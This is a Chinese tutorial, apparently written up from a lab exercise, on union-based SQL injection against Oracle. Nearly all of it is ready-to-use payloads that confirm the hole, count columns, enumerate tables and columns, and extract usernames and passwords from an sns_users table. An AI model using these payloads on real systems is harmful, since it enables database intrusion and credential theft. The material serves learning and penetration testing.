1、判断注入点
输入 and 1=1,页面正常;输入 and 1=2,页面出错。两次响应不同,说明输入被直接拼接进了 SQL 语句而未参数化,存在 SQL 注入。
2、判断列数
输入 order by 2,页面正常;输入 order by 3,页面出错,所以查询结果只有两列。
3、获取显错点(回显位置)
union select 'null','null' from dual (dual 为 Oracle 的伪表)
4、查询当前数据库库名(实际取的是 V$INSTANCE 视图中的 instance_name,即实例名)
-1 union select 'null',(select instance_name from V$INSTANCE) from dual
5、查询数据库表名
第一个表名
-1 union select 'null',(select table_name from user_tables where rownum=1) from dual
第二个表名
-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
第三个表名
-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_name not in 'LOGMNR_GLOBAL$') from dual
模糊查询带user的表名
-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual
6、查询数据库列名
模糊搜索
-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual
-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual
7、查询表中数据,获取账号、密码字段的内容
-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1
-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'
-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'